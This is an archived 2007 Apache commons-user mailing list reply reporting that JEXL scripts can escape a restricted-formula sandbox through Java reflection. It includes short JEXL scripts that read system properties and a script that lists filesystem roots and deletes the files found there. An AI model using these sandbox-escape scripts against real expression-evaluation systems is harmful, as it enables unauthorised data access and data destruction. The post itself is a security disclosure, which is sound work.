commons-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Trevor Harrison" <trevorsharri...@gmail.com>
Subject Re: JEXL security issue with system properties
Date Fri, 05 Oct 2007 15:42:41 GMT
Replying to myself:

On 10/4/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> While looking for other ways to 'break' out, I started thinking about
> classloaders.  I haven't succeeded in getting a classloader yet in a
> script, but if I could, it would be bad for my intended usage of JEXL
> (as a fairly secure way of executing user supplied formulas).
>
> // this doesn't work
> cl = intClazz.getClassLoader();  // this fails, returns a null

Well, still not sure why that method is returning a null for the
classloader, but if I call (the much simpler) clazz.forName(), I can
get a reference to a class:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.lang.System");
m = clazz.getMethod("getProperties", null);
p = m.invoke(null, null);

which successfully gets me the system properties.  Which is probably
the least of my worries, considering I could do something like:

i = 0;
intClazz = i.class;
clazz = intClazz.forName("java.io.File");
m = clazz.getMethod("listRoots", null);
roots = m.invoke(null, null);
files = roots[0].listFiles();
foreach( file in files )
{
  file.delete();
}

---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
For additional commands, e-mail: user-help@commons.apache.org


Mime
View raw message